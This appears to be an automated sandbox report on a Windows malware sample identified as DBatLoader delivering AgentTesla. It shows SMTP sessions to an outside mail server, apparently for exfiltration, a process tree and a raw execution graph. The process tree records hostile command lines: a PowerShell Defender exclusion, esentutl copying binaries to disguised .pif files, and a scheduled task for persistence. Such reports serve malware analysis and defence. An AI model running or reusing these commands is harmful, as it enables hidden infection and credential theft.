    CF-RAY: 8e175d1a9c79e857-DFW
    server-timing: cfL4;desc="?proto=TCP&rtt=2159&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=769&delivery_rate=1334562&cwnd=243&unsent_bytes=0&cid=df8be34052f87932&ts=359&x=0"
2024-11-12 14:55:33 UTC | 14 | IN | Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38
    Data Ascii: 173.254.250.68


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Nov 12, 2024 15:55:14.193897009 CET | 587 | 49714 | 51.195.88.199 | 192.168.2.6 | 220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:55:13 +0000
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Nov 12, 2024 15:55:14.194489002 CET | 587 | 49714 | 51.195.88.199 | 192.168.2.6 | 220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:55:13 +0000
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Nov 12, 2024 15:55:14.194719076 CET | 587 | 49714 | 51.195.88.199 | 192.168.2.6 | 220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:55:13 +0000
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Nov 12, 2024 15:55:14.322037935 CET | 49714 | 587 | 192.168.2.6 | 51.195.88.199 | EHLO 835180
Nov 12, 2024 15:55:14.566231012 CET | 587 | 49714 | 51.195.88.199 | 192.168.2.6 | 250-s82.gocheapweb.com Hello 835180 [173.254.250.68]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPECONNECT
    250-STARTTLS
    250 HELP
Nov 12, 2024 15:55:14.566481113 CET | 49714 | 587 | 192.168.2.6 | 51.195.88.199 | STARTTLS
Nov 12, 2024 15:55:14.810122013 CET | 587 | 49714 | 51.195.88.199 | 192.168.2.6 | 220 TLS go ahead
Nov 12, 2024 15:55:20.072123051 CET | 587 | 49729 | 51.195.88.199 | 192.168.2.6 | 220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:55:19 +0000
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Nov 12, 2024 15:55:20.072320938 CET | 49729 | 587 | 192.168.2.6 | 51.195.88.199 | EHLO 835180
Nov 12, 2024 15:55:20.314228058 CET | 587 | 49729 | 51.195.88.199 | 192.168.2.6 | 250-s82.gocheapweb.com Hello 835180 [173.254.250.68]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPECONNECT
    250-STARTTLS
    250 HELP
Nov 12, 2024 15:55:20.314373016 CET | 49729 | 587 | 192.168.2.6 | 51.195.88.199 | STARTTLS
Nov 12, 2024 15:55:20.556962013 CET | 587 | 49729 | 51.195.88.199 | 192.168.2.6 | 220 TLS go ahead
Nov 12, 2024 15:55:29.291229010 CET | 587 | 49764 | 51.195.88.199 | 192.168.2.6 | 220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:55:29 +0000
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Nov 12, 2024 15:55:29.291485071 CET | 49764 | 587 | 192.168.2.6 | 51.195.88.199 | EHLO 835180
Nov 12, 2024 15:55:29.530637026 CET | 587 | 49764 | 51.195.88.199 | 192.168.2.6 | 250-s82.gocheapweb.com Hello 835180 [173.254.250.68]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPECONNECT
    250-STARTTLS
    250 HELP
Nov 12, 2024 15:55:29.530822039 CET | 49764 | 587 | 192.168.2.6 | 51.195.88.199 | STARTTLS
Nov 12, 2024 15:55:29.770565033 CET | 587 | 49764 | 51.195.88.199 | 192.168.2.6 | 220 TLS go ahead
Nov 12, 2024 15:55:36.646610022 CET | 587 | 49791 | 51.195.88.199 | 192.168.2.6 | 220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:55:36 +0000
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Nov 12, 2024 15:55:36.750961065 CET | 49791 | 587 | 192.168.2.6 | 51.195.88.199 | EHLO 835180
Nov 12, 2024 15:55:36.990494013 CET | 587 | 49791 | 51.195.88.199 | 192.168.2.6 | 250-s82.gocheapweb.com Hello 835180 [173.254.250.68]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPECONNECT
    250-STARTTLS
    250 HELP
Nov 12, 2024 15:55:36.991472006 CET | 49791 | 587 | 192.168.2.6 | 51.195.88.199 | STARTTLS
Nov 12, 2024 15:55:37.238938093 CET | 587 | 49791 | 51.195.88.199 | 192.168.2.6 | 220 TLS go ahead
Nov 12, 2024 15:55:41.566704035 CET | 587 | 49806 | 51.195.88.199 | 192.168.2.6 | 220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:55:41 +0000
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Nov 12, 2024 15:55:41.566915035 CET | 49806 | 587 | 192.168.2.6 | 51.195.88.199 | EHLO 835180
Nov 12, 2024 15:55:41.808840036 CET | 587 | 49806 | 51.195.88.199 | 192.168.2.6 | 250-s82.gocheapweb.com Hello 835180 [173.254.250.68]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPECONNECT
    250-STARTTLS
    250 HELP
Nov 12, 2024 15:55:41.812414885 CET | 49806 | 587 | 192.168.2.6 | 51.195.88.199 | STARTTLS
Nov 12, 2024 15:55:42.053936958 CET | 587 | 49806 | 51.195.88.199 | 192.168.2.6 | 220 TLS go ahead
Nov 12, 2024 15:57:52.116003036 CET | 587 | 49998 | 51.195.88.199 | 192.168.2.6 | 220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:57:51 +0000
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Nov 12, 2024 15:57:52.116137981 CET | 49998 | 587 | 192.168.2.6 | 51.195.88.199 | EHLO 835180
Nov 12, 2024 15:57:52.360385895 CET | 587 | 49998 | 51.195.88.199 | 192.168.2.6 | 250-s82.gocheapweb.com Hello 835180 [173.254.250.68]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPECONNECT
    250-STARTTLS
    250 HELP
Nov 12, 2024 15:57:52.360538960 CET | 49998 | 587 | 192.168.2.6 | 51.195.88.199 | STARTTLS
Nov 12, 2024 15:57:52.604729891 CET | 587 | 49998 | 51.195.88.199 | 192.168.2.6 | 220 TLS go ahead
Nov 12, 2024 15:58:23.840064049 CET | 587 | 49999 | 51.195.88.199 | 192.168.2.6 | 220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:58:23 +0000
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Nov 12, 2024 15:58:23.840249062 CET | 49999 | 587 | 192.168.2.6 | 51.195.88.199 | EHLO 835180
Nov 12, 2024 15:58:24.083244085 CET | 587 | 49999 | 51.195.88.199 | 192.168.2.6 | 250-s82.gocheapweb.com Hello 835180 [173.254.250.68]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPECONNECT
    250-STARTTLS
    250 HELP
Nov 12, 2024 15:58:24.083436966 CET | 49999 | 587 | 192.168.2.6 | 51.195.88.199 | STARTTLS
Nov 12, 2024 15:58:24.324368954 CET | 587 | 49999 | 51.195.88.199 | 192.168.2.6 | 220 TLS go ahead
Nov 12, 2024 15:59:13.484740019 CET | 587 | 50001 | 51.195.88.199 | 192.168.2.6 | 220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:59:13 +0000
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Nov 12, 2024 15:59:13.484862089 CET | 50001 | 587 | 192.168.2.6 | 51.195.88.199 | EHLO 835180
Nov 12, 2024 15:59:14.074748993 CET | 587 | 50001 | 51.195.88.199 | 192.168.2.6 | 250-s82.gocheapweb.com Hello 835180 [173.254.250.68]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPECONNECT
    250-STARTTLS
    250 HELP

                                                                                                              Target ID:0
                                                                                                              Start time:09:54:59
                                                                                                              Start date:12/11/2024
                                                                                                              Path:C:\Users\user\Desktop\x.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\x.exe"
                                                                                                              Imagebase:0x400000
                                                                                                              File size:1'081'856 bytes
                                                                                                              MD5 hash:31BC6907D6097A76BB1DD891CFC09B7A
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:Borland Delphi
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.2111562829.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:3
                                                                                                              Start time:09:55:04
                                                                                                              Start date:12/11/2024
                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" "
                                                                                                              Imagebase:0x1c0000
                                                                                                              File size:236'544 bytes
                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:4
                                                                                                              Start time:09:55:04
                                                                                                              Start date:12/11/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff66e660000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:5
                                                                                                              Start time:09:55:04
                                                                                                              Start date:12/11/2024
                                                                                                              Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                                                                                                              Imagebase:0xa40000
                                                                                                              File size:352'768 bytes
                                                                                                              MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate
                                                                                                              Has exited:true

                                                                                                              Target ID:6
                                                                                                              Start time:09:55:05
                                                                                                              Start date:12/11/2024
                                                                                                              Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o
                                                                                                              Imagebase:0xa40000
                                                                                                              File size:352'768 bytes
                                                                                                              MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate
                                                                                                              Has exited:true

                                                                                                              Target ID:7
                                                                                                              Start time:09:55:05
                                                                                                              Start date:12/11/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff66e660000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:8
                                                                                                              Start time:09:55:06
                                                                                                              Start date:12/11/2024
Path: C:\Users\Public\Libraries\lxsyrsiW.pif
Wow64 process (32bit): true
Commandline: C:\Users\Public\Libraries\lxsyrsiW.pif
Imagebase: 0x400000
File size: 68'096 bytes
MD5 hash: C116D3604CEAFE7057D77FF27552C215
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 3%, ReversingLabs
Reputation: moderate
Has exited: true

Target ID: 9
Start time: 09:55:07
Start date: 12/11/2024
Path: C:\Users\user\AppData\Local\Temp\neworigin.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Imagebase: 0x840000
File size: 250'368 bytes
MD5 hash: D6A4CF0966D24C1EA836BA9A899751E5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2395131406.0000000002BEC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000000.2187675725.0000000000842000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.2187675725.0000000000842000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2395131406.0000000002BF4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2395131406.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2395131406.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security
• Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: ditekSHen
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 88%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 10
Start time: 09:55:07
Start date: 12/11/2024
Path: C:\Users\user\AppData\Local\Temp\server_BTC.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Imagebase: 0xb00000
File size: 231'936 bytes
MD5 hash: 50D015016F20DA0905FD5B37D7834823
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 66%, ReversingLabs
Reputation: moderate
Has exited: true

Target ID: 11
Start time: 09:55:09
Start date: 12/11/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Imagebase: 0x650000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 12
Start time: 09:55:09
Start date: 12/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 13
Start time: 09:55:09
Start date: 12/11/2024
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:00 /du 23:59 /sc daily /ri 1 /f
Imagebase: 0x840000
File size: 187'904 bytes
MD5 hash: 48C2FE20575769DE916F48EF0676A965
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 14
Start time: 09:55:09
Start date: 12/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 15
Start time: 09:55:11
Start date: 12/11/2024
Path: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Imagebase: 0xb60000
File size: 231'936 bytes
MD5 hash: 50D015016F20DA0905FD5B37D7834823
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 66%, ReversingLabs
Has exited: true

Target ID: 16
Start time: 09:55:11
Start date: 12/11/2024
Path: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Imagebase: 0x6d0000
File size: 231'936 bytes
MD5 hash: 50D015016F20DA0905FD5B37D7834823
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 17
Start time: 09:55:11
Start date: 12/11/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFB9.tmp.cmd""
Imagebase: 0x1c0000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 18
Start time: 09:55:11
Start date: 12/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 19
Start time: 09:55:11
Start date: 12/11/2024
Path: C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit): true
Commandline: timeout 6
Imagebase: 0x1e0000
File size: 25'088 bytes
MD5 hash: 976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 20
Start time: 09:55:14
Start date: 12/11/2024
Path: C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase: 0x7ff717f30000
File size: 496'640 bytes
MD5 hash: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 22
Start time: 09:55:19
Start date: 12/11/2024
Path: C:\Users\Public\Libraries\Wisrysxl.PIF
Wow64 process (32bit): true
Commandline: "C:\Users\Public\Libraries\Wisrysxl.PIF"
Imagebase: 0x400000
File size: 1'081'856 bytes
MD5 hash: 31BC6907D6097A76BB1DD891CFC09B7A
Has elevated privileges: false
Has administrator privileges: false
Programmed in: Borland Delphi
Antivirus matches:
• Detection: 29%, ReversingLabs
Has exited: true

Target ID: 24
Start time: 09:55:21
Start date: 12/11/2024
Path: C:\Users\Public\Libraries\lxsyrsiW.pif
Wow64 process (32bit): true
Commandline: C:\Users\Public\Libraries\lxsyrsiW.pif
Imagebase: 0x400000
File size: 68'096 bytes
MD5 hash: C116D3604CEAFE7057D77FF27552C215
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 25
Start time: 09:55:22
Start date: 12/11/2024
Path: C:\Users\user\AppData\Local\Temp\neworigin.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Imagebase: 0x680000
File size: 250'368 bytes
MD5 hash: D6A4CF0966D24C1EA836BA9A899751E5
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000002.2459185652.0000000002B8C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.2459185652.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000002.2459185652.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000002.2459185652.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited: true

Target ID: 26
Start time: 09:55:22
Start date: 12/11/2024
Path: C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                                                                                                              Imagebase:0xef0000
                                                                                                              File size:231'936 bytes
                                                                                                              MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:27
                                                                                                              Start time:09:55:28
                                                                                                              Start date:12/11/2024
                                                                                                              Path:C:\Users\Public\Libraries\Wisrysxl.PIF
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\Public\Libraries\Wisrysxl.PIF"
                                                                                                              Imagebase:0x400000
                                                                                                              File size:1'081'856 bytes
                                                                                                              MD5 hash:31BC6907D6097A76BB1DD891CFC09B7A
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:Borland Delphi
                                                                                                              Has exited:true

                                                                                                              Target ID:28
                                                                                                              Start time:09:55:29
                                                                                                              Start date:12/11/2024
                                                                                                              Path:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                              Imagebase:0x400000
                                                                                                              File size:68'096 bytes
                                                                                                              MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:29
                                                                                                              Start time:09:55:30
                                                                                                              Start date:12/11/2024
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\neworigin.exe"
                                                                                                              Imagebase:0xed0000
                                                                                                              File size:250'368 bytes
                                                                                                              MD5 hash:D6A4CF0966D24C1EA836BA9A899751E5
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001D.00000002.4593833570.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001D.00000002.4593833570.000000000329C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000002.4593833570.0000000003271000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001D.00000002.4593833570.0000000003271000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Has exited:false

                                                                                                              Target ID:30
                                                                                                              Start time:09:55:31
                                                                                                              Start date:12/11/2024
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                                                                                                              Imagebase:0x930000
                                                                                                              File size:231'936 bytes
                                                                                                              MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:32
                                                                                                              Start time:09:55:36
                                                                                                              Start date:12/11/2024
                                                                                                              Path:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                                                                                                              Imagebase:0xf50000
                                                                                                              File size:231'936 bytes
                                                                                                              MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true


                                                                                                                Execution Graph

                                                                                                                Execution Coverage:16.1%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:67.8%
                                                                                                                Total number of Nodes:2000
                                                                                                                Total number of Limit Nodes:25
                                                                                                                execution_graph
GetModuleHandleW 35363->37709 35366 2edfb00 35367 2edfb1e 35366->35367 35368 2ed89d0 20 API calls 35367->35368 35369 2edfb27 35368->35369 35370 2edfb45 35369->35370 35371 2ed89d0 20 API calls 35370->35371 35372 2edfb4e 35371->35372 35373 2ec46d4 35372->35373 35374 2edfb5e 35373->35374 35375 2edfb75 35374->35375 35376 2ed89d0 20 API calls 35375->35376 35377 2edfb81 35376->35377 35378 2ec4860 11 API calls 35377->35378 35379 2edfba2 35378->35379 35380 2edfbad 35379->35380 35381 2ec47ec 11 API calls 35380->35381 35382 2edfbd9 35381->35382 37713 2ec49a0 35382->37713 35385 2edfbf1 35386 2ed89d0 20 API calls 35385->35386 35387 2edfbfd 35386->35387 35388 2ec46d4 35387->35388 35389 2edfc0d 35388->35389 35390 2edfc24 35389->35390 35391 2ed89d0 20 API calls 35390->35391 35392 2edfc30 35391->35392 35393 2edfc40 35392->35393 35394 2ec46d4 35393->35394 35395 2edfc57 35394->35395 35396 2ed89d0 20 API calls 35395->35396 35397 2edfc63 35396->35397 35398 2edfc73 35397->35398 35399 2ed89d0 20 API calls 35398->35399 35400 2edfc96 35399->35400 35401 2ec4860 11 API calls 35400->35401 35402 2edfcb7 35401->35402 35403 2edfccf 35402->35403 35404 2ec47ec 11 API calls 35403->35404 35405 2edfcee 35404->35405 35406 2edfd06 35405->35406 35407 2ed89d0 20 API calls 35406->35407 35408 2edfd12 35407->35408 35409 2ec4860 11 API calls 35408->35409 35410 2edfd33 35409->35410 35411 2edfd3e 35410->35411 35412 2edfd4b 35411->35412 35413 2ec47ec 11 API calls 35412->35413 35414 2edfd6a 35413->35414 35415 2edfd75 35414->35415 35416 2ed89d0 20 API calls 35415->35416 35417 2edfd8e 35416->35417 35418 2edfd9e 35417->35418 35419 2ed89d0 20 API calls 35418->35419 35420 2edfdc1 35419->35420 35421 2edfdd1 35420->35421 35422 2edfde8 35421->35422 35423 2ed89d0 20 API calls 35422->35423 35424 2edfdf4 35423->35424 35425 2edfe04 35424->35425 35426 2edfe1b 35425->35426 35427 2ed89d0 20 API calls 35426->35427 35428 2edfe27 35427->35428 35429 2ec4860 11 API calls 35428->35429 35430 2edfe48 35429->35430 35431 2edfe53 
